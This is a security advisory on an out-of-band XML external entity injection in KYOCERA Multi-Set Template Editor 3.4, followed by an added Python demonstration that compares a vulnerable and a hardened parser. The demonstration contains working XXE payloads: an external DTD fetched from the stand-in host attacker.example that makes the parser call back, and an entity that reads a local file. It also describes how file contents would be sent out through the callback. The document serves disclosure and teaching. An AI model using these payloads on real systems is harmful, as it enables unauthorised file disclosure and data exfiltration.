Key information

Advisory ID: ZSL-2018-5459
Title: KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, DoS
Risk: (4/5)
Release Date: 07.04.2018

Summary

KYOCERA Net Admin is Kyocera's unified device management software; it simplifies the management of up to 10,000 devices.

Vulnerability Description

Version 3.4.0906 is affected by an unauthenticated XML External Entity (XXE) injection. XML supplied to the Multi-Set Template Editor is parsed with external entity resolution enabled, so an attacker can declare an entity that points at a local file or at an attacker-controlled host. The result is arbitrary data disclosure: file contents are retrieved through an out-of-band channel, i.e. the parser itself connects to the attacker's host, so the attack works even when the application never echoes the parsed data back.

Affected Version

3.4.0906

Tested On

Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15

Vendor Status

[28.03.2018] Vulnerability discovered.
[28.03.2018] Vendor contacted.
[06.04.2018] No response from the vendor.
[07.04.2018] Public security advisory released.

PoC

kyocera_xxe.txt

References

1. exploit-db
2. X-Force IBM
3. CxSecurity
4. Packetstorm
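Worked example (added here; it is not the advisory's PoC kyocera_xxe.txt and not KYOCERA code). It shows the two halves of the vulnerability class described above, run against a parser with external entity resolution switched on and then off: a blind/out-of-band probe in which the parser fetches an attacker-hosted DTD and calls back to the attacker's host, and an in-band read in which a local file is copied into the parsed document. Python's stdlib SAX parser (expat) stands in for the Multi-Set Template Editor's XML parser; the <template> document shape, the listener URL (a reserved .example name that is never contacted; a stub EntityResolver answers for it from memory and logs every request) and the secret file are assumptions made for the example.

```python
"""XXE: out-of-band callback and in-band file read, vulnerable vs hardened parser.

Added example for this advisory, not the advisory's PoC and not KYOCERA code.
The stdlib SAX parser (expat) stands in for the editor's XML parser;
AttackerServer stands in for the attacker-controlled web host.
"""
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

ATTACKER = "http://attacker.example"  # assumed listener URL, answered from memory below

# Attacker-hosted DTD: declares a second external parameter entity pointing back
# at the listener and references it, so a vulnerable parser makes a second
# request. That callback is the out-of-band signal that blind XXE works.
OOB_DTD = f'<!ENTITY % callback SYSTEM "{ATTACKER}/callback">\n%callback;\n'.encode()


class AttackerServer(EntityResolver):
    """Stand-in for the attacker's HTTP listener: serves URLs under ATTACKER from
    memory and records every path the parser asks for. Any other system ID
    (for example file:///...) is handed back untouched so the parser opens it
    itself; that is the local file read."""

    def __init__(self, dtd):
        self.dtd = dtd
        self.requests = []

    def resolveEntity(self, publicId, systemId):
        if not systemId.startswith(ATTACKER):
            return systemId
        self.requests.append(systemId[len(ATTACKER):])
        body = self.dtd if systemId.endswith("/evil.dtd") else b"<!-- ok -->\n"
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(body))
        return source


def oob_payload():
    """Blind XXE probe: the internal subset pulls the attacker's DTD, which then
    makes the parser call back. Nothing comes back in the response; the
    evidence lives at the listener."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE template [\n"
        f'  <!ENTITY % remote SYSTEM "{ATTACKER}/evil.dtd">\n'
        "  %remote;\n"
        "]>\n"
        "<template><name>probe</name></template>"
    ).encode()


def inband_payload(file_url):
    """Classic in-band XXE: the parser reads the file and echoes it into <name>."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE template [\n"
        f'  <!ENTITY secret SYSTEM "{file_url}">\n'
        "]>\n"
        "<template><name>&secret;</name></template>"
    ).encode()


class TextCollector(ContentHandler):
    """Collects character data, i.e. what the application would store or display."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse(document, server, resolve_external):
    """resolve_external=True models the vulnerable parser (external entities are
    fetched); False is the stdlib default since Python 3.7.1 and models the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setEntityResolver(server)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.parts)


def run_demo():
    """Run both payloads against the vulnerable and the hardened configuration."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp, "secret.txt")
        secret.write_text("zsl-secret-token-0042")  # constructed stand-in for a config file
        for label, vulnerable in (("vulnerable", True), ("hardened", False)):
            server = AttackerServer(OOB_DTD)
            parse(oob_payload(), server, vulnerable)
            results[label] = {
                "listener_requests": list(server.requests),
                "disclosed": parse(inband_payload(secret.as_uri()), server, vulnerable),
            }
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label:10s} listener saw {outcome['listener_requests']}, "
              f"disclosed {outcome['disclosed']!r}")
```

With resolution enabled the listener logs /evil.dtd followed by /callback and the in-band document comes back carrying the file contents; with resolution disabled the listener sees nothing and the entity expands to an empty string. In a real engagement ATTACKER is a collaborator host you control, and the attacker's DTD would go one step further than this example by embedding the file contents into the callback URL through a second parameter entity; that is the "retrieval through an out-of-band channel" the advisory refers to. For a Java application such as one deployed on Tomcat, the equivalent of the hardened branch is to disable DOCTYPE declarations or external general and parameter entities on the parser factory rather than to rely on output handling.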